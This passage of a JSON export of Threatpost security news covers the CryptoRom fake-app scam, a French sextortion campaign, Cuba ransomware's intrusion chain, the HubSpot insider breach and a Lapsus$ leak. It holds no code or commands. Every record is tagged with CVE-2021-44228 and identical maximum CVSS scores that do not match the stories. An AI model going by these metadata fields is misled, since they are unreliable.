threats.\u201d\n\n## What\u2019s New This Time?\n\nA crucial component to the CryptoRom attack flow is those fake apps. Victims might receive a link to download what purports to be BTCBOX, for example, or Binance \u2013 perfectly legitimate cryptocurrency trading platforms. These apps appear to have professional user interfaces, and even come with customer-service chat options.\n\nApple and Google apply strict vetting to weed out malicious mobile apps like these from their official stores. But, as Threatpost has [covered before](<https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/>), hackers have clever tricks to get around conventional security testing. 
In the past, for example, CryptoRom\u2019s preferred method was to use [the Apple Developer Program and Enterprise Signatures](<https://threatpost.com/cryptorom-scammers-apple-enterprise-features/175474/>).\n\nNow, CryptoRom is taking advantage of two new iOS features.\n\nThe first, TestFlight, is a feature developers can use to distribute beta versions of their apps to testers.\n\n\u201cUnfortunately,\u201d wrote the researchers, \u201cjust as we\u2019ve seen happen with other alternative app distribution schemes supported by Apple, \u2018TestFlight Signature\u2019 is available as a hosted service for alternative iOS app deployment, making it all too simple for malware authors to abuse.\u201d\n\nCryptoRom has shifted from Enterprise Signatures towards TestFlight Signatures because, wrote Sophos, \u201cit is a bit cheaper\u201d \u2013 requiring only an .IPA file with a compiled iOS app. Apps also look \u201cmore legitimate when distributed with the Apple Test Flight App,\u201d researchers added. \u201cThe review process is also believed to be less stringent than App Store review.\u201d\n\n\u201cHackers leveraging Apple\u2019s TestFlight platform as a distribution mechanism for malicious apps is a clever \u2014 and relatively simple \u2014 tactic that can certainly lead to problems for victims,\u201d Ray Kelly, fellow at NTT Application Security, told Threatpost. \u201cUsers should understand that side-loading applications is always a precarious proposition. Apps that are downloaded and installed outside of the App Store or Google Play ecosystem have not been vetted for security and privacy risks, leaving the door wide open for attackers to compromise users\u2019 personal data and sometimes, their financial accounts.\u201d\n\nEven more so than TestFlight, CryptoRom attackers have been using WebClips, a feature that allows web links to be added to the iOS home screen like regular apps. 
Malicious WebClips mimic real apps like RobinHood (in the following case, \u201cRobinHand\u201d).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/16132308/RobinHand.png>)\n\nA malicious WebClip offering in the Apple App Store. Source: Sophos.\n\n\u201cIn addition to App Store pages, all these fake pages also had linked websites with similar templates to convince users,\u201d the researchers wrote. \u201cThis shows how cheap and easy it is to mimic popular brands while siphoning thousands of dollars from victims.\u201d\n\nSince it\u2019s almost impossible for law enforcement to crack down on any one individual scam, app store providers have a responsibility to monitor for misuse of these developer tools, Mark Lambert, vice president of products at ArmorCode, told Threatpost. He added, \u201cUltimately, however, the problem is a lack of security awareness. It is essential that users look for things that \u2018don\u2019t look right\u2019 and have a fundamental view of not trusting electronic communications or taking them on face value.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. 
_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T17:32:59", "type": "threatpost", "title": "\u2018CryptoRom\u2019 Crypto Scam is Back via Side-Loaded Apps", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-16T17:32:59", "id": "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "href": "https://threatpost.com/cryptorom-crypto-scam-side-loaded-apple-apps/178942/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-23T17:30:25", "description": "A new French-language [sextortion campaign](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>) is making the rounds, researchers warn.\n\nAs noted by Sophos researchers in a Monday [report](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>), sextortion is one of the oldest tricks in the book, but its popularity has waned in recent years due to effective cybersecurity, law enforcement crackdowns and the rise of ransomware.\n\nThis new campaign is one 
signal of what may be a resurgence, they said.\n\n## Threats Sandwich Malware Links\n\nThe new French-language attack entails a blind email blast, shown below, with unsubstantiated claims of video evidence and so on. It cites France\u2019s legal penalties for watching illegal pornography, then tells the reader: \u201cIf you wish, you may reply to the address below to explain away your actions, so that we can evaluate your explanation and determine if charges should be brought. You have a strict deadline of 72 hours.\u201d\n\nShould the reader not comply, \u201cwe will are [sic] obliged to send our report to the Public Prosecutor to issue an arrest warrant against you. We will proceed to have you arrested by the police closest to your place of residence.\u201d\n\nNotably, the malicious email contains no plaintext or hyperlinks. Instead, its text is displayed in an image file.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/23114449/French-sextortion-threat-email-e1645634734663.png>)\n\nFrench-language sextortion threat email. Source: Sophos.\n\nAttackers use hyperlinks to trick unwitting victims into downloading malware or visiting malicious webpages. 
As Sophos explains, \u201cAdding an image that holds the call-to-action text obviously makes it harder for a recipient to reply, because a plain image can\u2019t contain clickable links, or even text that can be copied and pasted.\u201d\n\nBut, as Mike Parkin \u2013 senior technical engineer at Vulcan Cyber \u2013 told Threatpost via email, \u201cThe fact that most scams end up in our junk mail folder shows how effective email filters have become, which is why they look to alternative methods like embedded PDFs or images rather than raw text or HTML that is easy for the filters to analyze.\u201d\n\n## What is Sextortion?\n\nSextortion is a form of blackmail in which a malicious actor claims to possess evidence of sexual misbehavior from their victim. The attacker demands payment in exchange for not spreading the compromising information or images.\n\nSometimes, these campaigns can combine with [botnets](<https://threatpost.com/phorpiex-botnet-shifts-ransomware-sextortion/149295/>), [ransomware](<https://threatpost.com/sextortion-emails-force-payment-via-gandcrab-ransomware/139753/>) and other methods of cyber attack to form a potent cocktail. However, as [prior](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) [attacks](<https://threatpost.com/sextortionists-defenses-cryptocurrency-shift/148967/>) have shown, sextortion tends to be rudimentary: Such attacks aren\u2019t targeted. Rather, they entail blind email blasts that prey on victims\u2019 fear, without any actual evidence of sexual impropriety to back them up.\n\n## Sextortion is on the Rise Again\n\n\u201cScams seem to run in cycles,\u201d notes Parkin. \u201cWhether it\u2019s a Prince from Nigeria, uncollected assets, scam victim compensation, extortion over adult websites you didn\u2019t visit, or whatever. Scammers will use one for a while, then shift to something else when they stop getting responses. 
Eventually, they\u2019ll circle back to an old scam that may have been updated with new text or a new graphic.\u201d\n\nLionel Sigal, CTI at CYE, told Threatpost via email that sextortion has recently been skyrocketing; \u201cSextortion attempts (real and fake) targeting executives of organizations have increased by 800% in the last 4 months,\u201d he said.\n\nCampaigns targeting ordinary individuals are also spiking: The FBI\u2019s Internet Crime Complaint Center received more than [16,000 sextortion complaints](<https://www.ic3.gov/Media/Y2021/PSA210902>) in only the first seven months of 2021.\n\nWill this old-hat method of cyber attack prove effective? \u201cIt\u2019s too early to tell what the hit rate is on this technique,\u201d Casey Ellis, Founder and CTO of Bugcrowd, told Threatpost via email, \u201cbut it feels to me like a pivot that people would fall for. If a scam has a take of $500 and it costs 1 cent to send an email, you only have to connect 1 in 50,000 times for the scam to break even.\u201d\n\nTo Parkin, \u201cthe best defense is solid user education. No matter how successful an attacker is at getting past the filters, their attack can only succeed if the target falls for it and takes the bait.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. 
[REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-23T17:20:41", "type": "threatpost", "title": "Sextortion Rears Its Ugly Head Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-23T17:20:41", "id": "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "href": "https://threatpost.com/sextortion-rears-its-ugly-head-again/178595/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T20:31:43", "description": "The ransomware gang known as \u201cCuba\u201d is increasingly shifting to exploiting Microsoft Exchange vulnerabilities \u2013 including [ProxyShell](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) and [ProxyLogon](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) \u2013 as initial infection vectors, 
researchers have found.\n\nThe group has likely been prying open these chinks in victims\u2019 armor as early as last August, Mandiant [reported](<https://www.mandiant.com/resources/unc2596-cuba-ransomware>) on Wednesday.\n\nMandiant, which tracks the threat actor as UNC2596, noted that the group deploys the COLDDRAW ransomware. In fact, Cuba may be the only group that uses COLDDRAW: At least, it\u2019s the only threat actor using it among those tracked by Mandiant, \u201cwhich may suggest it\u2019s exclusively used by the group,\u201d researchers said.\n\n## Cuba Has Rated an FBI Warning\n\nIn a December [flash alert](<https://www.ic3.gov/Media/News/2021/211203-2.pdf>), the FBI [attributed](<https://threatpost.com/cuba-ransomware-gang-44m-payouts/176790/>) a spate of attacks \u2013 on at least 49 U.S. entities in the financial, government, healthcare, manufacturing and information-technology sectors \u2013 to the group. For what it\u2019s worth, Mandiant hasn\u2019t seen Cuba attacking hospitals or other entities that provide urgent care.\n\nAt the time, the FBI noted that the Cuba ransomware is distributed using a first-stage implant that acts as a loader for follow-on payloads: the Hancitor malware, which has been around for [at least five years](<https://threatpost.com/hancitor-downloader-shifts-attack-strategy/120040/>).\n\nThis isn\u2019t the first time that Cuba has shown a taste for [Exchange vulnerabilities](<https://threatpost.com/tortilla-exchange-servers-proxyshell/175967/>), either. 
They\u2019re just one way that Hancitor operators gain initial access to target machines: Other avenues include phishing emails, and the exploitation of compromised credentials or legitimate Remote Desktop Protocol (RDP) tools, according to the FBI\u2019s December alert.\n\n## Microsoft Exchange Action\n\nTrue to form, Mandiant observed the group \u201cfrequently\u201d picking apart vulnerabilities on public-facing Microsoft Exchange infrastructure as an initial compromise vector. \u201cThe threat actors likely perform initial reconnaissance activities to identify internet-facing systems that may be vulnerable to exploitation,\u201d researchers said.\n\nNext, Cuba deployed webshells to establish a foothold in the compromised network. Then, the actors planted backdoors to establish a foothold, including the publicly available NetSupport RAT, as well as BEACON and BUGHATCH, which have been deployed using the TERMITE in-memory dropper.\n\nThe operators have mainly used credentials from valid accounts to escalate privileges, researchers noted. It\u2019s not always clear where they got the credentials from, but at least in some cases, they were stolen with credential-stealing tools such as Mimikatz and WICKER.\n\n\u201cWe have also observed these threat actors manipulating or creating Windows accounts and modifying file access permissions,\u201d researchers added. In one intrusion, the threat actor created a user account and added it to the admin and RDP groups, they said.\n\n## Infection Chain\n\nIn order to identify active network hosts to potentially encrypt and files to exfiltrate, Cuba has used WEDGECUT, a reconnaissance tool, which sends PING requests to a list of hosts generated by a PowerShell script that enumerates the Active Directory.\n\nThen, the crooks peek around to see what files might be of interest. 
They also routinely use a script to map all drives to network shares, \u201cwhich may assist in user file discovery,\u201d researchers noted.\n\nCuba threat actors have used several methods for lateral movement, including RDP, SMB, and PsExec, \u201cfrequently using BEACON to facilitate this movement,\u201d Mandiant said. Then they deploy various backdoors, including NetSupport, as well as BEACON and BUGHATCH, which are often deployed using the TERMITE in-memory dropper.\n\nTo finish up their extortion work, the gang tries to steal files and encrypt networked machines, threatening to publish to the shaming site exfiltrated data belonging to organizations that balk at paying ransom.\n\n## More Tools, More Malware\n\nAccording to Mandiant\u2019s report, Cuba is using webshells to load the TERMITE dropper: a password-protected, memory-only dropper with an encrypted shellcode payload. The payloads have included BEACON malware, the Metasploit stager or the group\u2019s custom BUGHATCH downloader.\n\nCuba isn\u2019t the only threat actor using the TERMITE dropper: Mandiant said that it\u2019s apparently used by \u201ca limited number\u201d of threat actors.\n\nOver the course of six months, collected TERMITE payloads show that its keepers have been grooming TERMITE, tweaking it so as to better burrow in and evade detections, researchers said.\n\n## Custom-Rolled Malware & Tools\n\nBeyond common, mainstay malware tools such as Cobalt Strike and [NetSupport](<https://malwiki.org/index.php?title=NetSupport_Manager>), Mandiant\u2019s analysis showed that Cuba has some novel malware up its sleeve, including:\n\n**BURNTCIGAR**: a utility that terminates endpoint security software.\n\n**WEDGECUT**: a reconnaissance tool that checks to see whether a list of hosts or IP addresses are online.\n\n**BUGHATCH**: a custom downloader that receives commands and code from a command-and-control (C2) server to execute on a compromised system.\n\nThe researchers noted that when COLDDRAW was 
deployed, Cuba used what they called \u201ca multi-faceted extortion model\u201d \u2013 i.e., besides encrypting data, the gang leaked it on the group\u2019s shaming site, which is depicted below in all its cigar-chomping glory.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/25121905/Cuba-ransomware-shaming-site-e1645809565513.png>)\n\nCuba ransomware\u2019s shaming site. Source: Mandiant.\n\n## Who Does Cuba Love the Best?\n\nThe majority \u2013 80 percent \u2013 of organizations victimized by Cuba are based in North America, but Cuba loves the United States more than anywhere. As shown by the victim map below, the United States is Cuba\u2019s favorite target, followed by Canada, though the group does go after European countries and other regions.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/25122040/cuba-ransomware-victims-per-country-e1645809655324.png>)\n\nCuba ransomware victims by country. Source: Mandiant.\n\nIts favorite industry sector to pick on is manufacturing, followed by financial services.\n\nWith regards to the victims listed on its shaming site \u2013 which the gang has had up since only early 2021 \u2013 Cuba provides a victim list for free, but it also keeps a separate list that you have to pay to see. Mandiant bit the bullet and sprang for that paid section.\n\nIt was sparse, to say the least: \u201c[The] paid section \u2026 listed only a single victim at the time of publication,\u201d its report said.\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-25T19:46:57", "type": "threatpost", "title": "Microsoft Exchange Server Bugs Exploited by 'Cuba' Ransomware Gang", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-25T19:46:57", "id": "THREATPOST:09118C676E28AC5D7BB791E76F75453C", "href": "https://threatpost.com/microsoft-exchange-exploited-cuba-ransomware/178665/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T17:16:18", "description": "A rogue employee working at HubSpot \u2013 used by more than 135,000 ([and growing](<https://www.hubspot.com/customer-spotlight>)) customers to manage marketing 
campaigns and on-board new users \u2013 has been fired over a breach that zeroed in on the company\u2019s cryptocurrency customers, the company [confirmed](<https://www.hubspot.com/en-us/march-2022-security-incident>) on Friday.\n\nThe breach has rippled through the crypto industry: As of Monday, crypto lending platform [BlockFi](<https://twitter.com/BlockFi/status/1504982848771608586>), bitcoin-purchasing automation platform [Swan Bitcoin](<https://twitter.com/SwanBitcoin/status/1505261139571191813>), bitcoin company [NYDIG](<https://nydig.com/>), peer-to-peer payments technology company Circle and cryptocurrency fund [Pantera Capital](<https://panteracapital.com/>) (which [was hit](<https://twitter.com/PanteraCapital/status/1362140521800622080?s=20&t=vQKoYhpK4bHoFjtc9V2KjQ>) a month prior) had been affected.\n\nThat list comes from the financial media outlet [Blockworks](<https://blockworks.co/nydig-blockfi-pantera-circle-all-targeted-in-hubspot-data-breach/>), which has reviewed emails the companies have sent to customers, along with public tweets, advising customers on how to stay safe.\n\nThe damage was minimal, HubSpot said in its March 18 notification: The thieves exported data from fewer than 30 customer portals. It\u2019s already notified the victimized companies, the company said.\n\nThreatpost asked HubSpot for a full list of affected HubSpot cryptocurrency customers, as well as confirmation of what superpowers its super admins have over customer data stored in the customer relationship management (CRM) platform. 
It responded by referring to one of those \u201cwe\u2019ve been breached\u201d canned [statements](<https://ir.hubspot.com/news/hubspots-statement-regarding-march-18-2022-security-incident>) that breached companies tend to put out: namely, \u201c\u200b\u200bWe take the privacy of our customers and their data incredibly seriously.\u201d\n\n## \u2018Bad Actor\u2019 Has Been Canned\n\nHubSpot said that it learned on Friday that a \u201cbad actor\u201d had compromised a HubSpot employee account \u2013 namely, what sounds like one of the \u2018super admin\u2019 accounts HubSpot has on both internal and external sides of its platform, [according to](<https://bitcoinmagazine.com/business/how-hubspot-data-breach-hits-bitcoiners>) another HubSpot super admin \u2013 and that the attack was focused on stealing data from its cryptocurrency industry customers.\n\n> \u201cWe have terminated access for the compromised HubSpot employee account and removed the ability for other employees to take certain actions in customer accounts.\u201d \u2014HubSpot\n\nThe rogue employee was attempting to access contact data, HubSpot [said](<https://www.cmswire.com/digital-marketing/hackers-target-cryptocurrency-companies-in-hubspot-data-breach/>). [CMS Wire](<https://www.cmswire.com/digital-marketing/hackers-target-cryptocurrency-companies-in-hubspot-data-breach/>) reported that HubSpot handed over details about the employee\u2019s actions to affected customers.\n\n## Data Stolen That Never Should Have Been There\n\nOn Saturday, the day after HubSpot reported the breach, Swan Bitcoin reassured customers that it uses HubSpot for \u201climited client communication and marketing data,\u201d not for financial information, transactions, or other sensitive personal or financial information.\n\n\u201cYou don\u2019t have to do anything,\u201d Swan reassured customers: \u201cYour funds are safe. 
Your Bitcoin is not at risk.\u201d\n\n> Yesterday, Hubspot, a third-party marketing vendor, confirmed a bad actor within their company gained access to Swan client marketing data.\n> \n> Read Cory\u2019s email to clients in the attached screenshots for details.\n> \n> We\u2019ll keep you updated. [pic.twitter.com/qtXVk5AOW8](<https://t.co/qtXVk5AOW8>)\n> \n> \u2014 Swan Bitcoin (@SwanBitcoin) [March 19, 2022](<https://twitter.com/SwanBitcoin/status/1505261139571191813?ref_src=twsrc%5Etfw>)\n\nAt least initially, it looked like data swept up in the breach was limited to names, emails, account types, phone numbers and, in some cases, company names, Swan said. The exfiltrated data didn\u2019t include Social Security numbers, tax IDs, birth dates, government IDs, bitcoin addresses or balances, according to Swan CEO Cory Klippstein.\n\nBut as of Tuesday, the situation looked a bit more grim, as Swan followed up with more details uncovered in its forensic investigation. It turns out that 0.2 percent of the dataset included \u201ca limited historical snapshot of USD deposits,\u201d the company said \u2013 an inclusion that\u2019s \u201cagainst company policy.\u201d The company said that it\u2019s conducted a post-mortem to ensure that the slippage won\u2019t happen again.\n\nAs well, about 1.2 percent of the dataset included clients\u2019 intended investment areas or the median net worth of their approximate geographic locales.\n\n\u201cAll of this sensitive data has been removed from client communications services,\u201d Klippstein [tweeted](<https://twitter.com/SwanBitcoin/status/1506355008127877123/>).\n\nThe fact that sensitive financial or personal data weren\u2019t included in the dataset is a positive. 
But there\u2019s still plenty of damage that can be done with the details that were exfiltrated, security specialists \u2013 and that HubSpot Super Admin \u2013 hastened to point out, starting with [social](<https://threatpost.com/phony-instagram-support-staff-emails-hit-insurance-company/178929/>) [engineering](<https://threatpost.com/phishing-campaign-targeted-those-aiding-ukraine-refugees/178752/>) attacks.\n\n## Just What Data Do CRMs Handle?\n\nHubSpot officials told CMS Wire that \u201cSome employees have access to HubSpot accounts,\u201d which allows certain employees \u2013 such as account managers and support specialists \u2013 to help out customers. \u201cIn this case, a bad actor was able to compromise an employee account and make use of this access to export contact data from a small number of HubSpot accounts,\u201d HubSpot reportedly said.\n\nIn writing for [Bitcoin Magazine](<https://bitcoinmagazine.com/business/how-hubspot-data-breach-hits-bitcoiners>), HubSpot super admin Robert Warren described exactly what can be done with his level of access rights, which, internally, allows employees to \u201chop between company accounts and export contact lists (and potentially all associated CRM data).\u201d\n\n\u201cWhile it is true that financial data is not stored in the CRM, you should be aware that data associated with the users of these companies and their behaviors is logged in the CRM,\u201d Warren wrote. 
\u201cThis puts users in a unique position to be targeted in social engineering attacks.\u201d\n\nHe gave the following examples of the types of data that CRM systems can store and which may have been exported in the HubSpot breach:\n\n * IP addresses\n * Email histories with representatives at the associated companies and any messages or notes those representatives have on customers and their accounts\n * Customer browsing behavior on associated company websites\n * Mailing and/or shipping addresses\n * How customers are characterized internally by companies (\u201cbig buyer,\u201d \u201cwhale,\u201d \u201cmid-sized contact,\u201d \u201csmall user,\u201d etc.)\n * Individual customers\u2019 financial value to companies\n * Any and all deals customers have done with compromised companies and any associated values, email negotiations or contacts\n * Help tickets or requests customers have logged with compromised companies\n\n## Breach Is \u2018Not Surprising\u2019\n\nCamellia Chan, CEO and founder of embedded artificial intelligence (AI) company X-PHY (a [Flexxon](<https://www.flexxon.com/>) brand), told Threstpost that given the surge in digital currency development, the breach \u201cisn\u2019t terribly surprising_._\u201d\n\n\u201cSurges in technological advancement create the perfect environment for cybercrime to flourish,\u201d Chan said. 
\u201cSo, with the rapid development of digital currencies was sure to come a rise in the cybersecurity risks associated with it.\u201d\n\nThe incident spotlights a much wider issue, Chan said: namely, the quantity of sensitive data that these types of organizations store across the enterprise.\n\nIt \u201cputs not only a specific business at risk, but threatens the potential growth, development, and future success of the entire digital currency industry,\u201d the CEO said.\n\n## Data Shared with Third-Parties Slips Out of Your Hands\n\nChris Clements, vice president of solutions architecture at cybersecurity company Cerberus Sentinel, told Threatpost that software-as-a-service (SaaS) and managed service providers are tempting targets, given that cybercriminals know that if they successfully compromise the provider, \u201cthey will likely gain access to the data or networks of hundreds or thousands of the providers\u2019 downstream customers.\n\n\u201cIt\u2019s a shortcut to mass exploitation that could otherwise take the attacker months or even years to achieve independently,\u201d Clements said via email.\n\nWord to the wise, HubSpot customers. 
Clements said that it\u2019s \u201cimperative\u201d for organizations to understand that whatever data they share with third-party partners or vendors \u201clargely becomes out of their control and with little recourse should it be stolen if the 3rd party is compromised.\u201d\n\nClements advised that all third parties be part of a regularly updated risk analysis based on the level of access or sensitivity of data shared with them.\n\n\u201cThe results of the risk analysis should inform a cybersecurity strategy for partner or vendor controls and mitigations to provide higher level of security assurance as is deemed necessary,\u201d he continued.\n\nSuch assessments should be backed up by mechanisms that verify that third parties are \u201ctaking appropriate steps to provide the needed security assurances and that they can prove it by sharing details about their controls or results of independent validation like a penetration test,\u201d Clements said.\n\n\u201d Not all vendors or partners can or will share this with their customers, but it\u2019s critical that in absence of that an organization throw up their hands as if nothing further can be done,\u201d he emphasized.\n\nHe gave these example of what questions should be covered:\n\n * Are there controls or safeguards built into the service platform that offer tighter controls or enhanced monitoring capabilities?\n * Are there operational processes that can limit potential data exposure from a breach of a partner like maximum data retention lifetimes?\n * At worst, is it no longer an acceptable risk to continue to do business with the company and to seek out alternatives?\n\n\u201cThese are all best practices for cybersecurity 3rd party management, but in order for them to be comprehensively applied, your organization requires a true culture of security that ensures that all external data sharing is evaluated for compliance with its own cybersecurity goals,\u201d he suggested.\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T17:11:40", "type": "threatpost", "title": "HubSpot Data Breach Ripples Through Crytocurrency Industry", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T17:11:40", "id": "THREATPOST:48FD4B4BFA020778797D684672C283B0", "href": "https://threatpost.com/hubspot-data-breach-crytocurrency-industry/179086/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:35:11", "description": "The Lapsus$ data extortionists are back from a week-long \u201cvacation,\u201d they announced on Telegram, posting ~70GB worth of data purportedly stolen from software 
development giant Globant.\n\n\u201cWe are officially back from a vacation,\u201d the gang wrote on their Telegram channel, posting images of exfiltrated data and admin credentials. The credentials, purportedly belonging to Globant\u2019s customers, unlock several of the company\u2019s Atlassian suite DevOps platforms, including GitHub, Jira, Confluence and the Crucible code-review tool.\n\nThe shared, 70GB torrent file purportedly also contains Globant\u2019s source code, as well as the Atlassian admin passwords. Security researchers shared the images today, on Wednesday.\n\nScreenshots show a folder directory of what looks like scads of companies from across the world, including tech bigwigs Arcserve, Facebook, the Apple Health app, DHL, Citibank, BNP Paribas Cardiff and Citibanamex, among others: just a teaser of the Globant data Lapsus$ has promised to leak.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30111855/Lapsus_Globant_leak-e1648653558836.jpg>)\n\nA teaser of the Globant data Lapsus$ said it was about to leak. Source: Telegram.\n\n> This is bad with all the keys, codes and damaging databases to go through to find corporate exposure and liability and to secure digital assets. <https://t.co/FHcs88V3nM>\n> \n> \u2014 Dominic Alvieri (@AlvieriD) [March 30, 2022](<https://twitter.com/AlvieriD/status/1509174961822486538?ref_src=twsrc%5Etfw>)\n\nThe folders could be evidence of client data having been exposed, or they might just refer to Globant backups. But Lapsus$ followed up by posting a 718.8KB torrent file to Telegram \u2013 a file that allegedly contains the leaked data. The post says: \u201cLeak of some customers source code from Globant[.]com corp GHE and GHE.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30113855/Lapsus-followup-torrent-file-e1648654747345.jpg>)\n\nFollowup torrent file posted to Lapsus$\u2019s Telegram channel. 
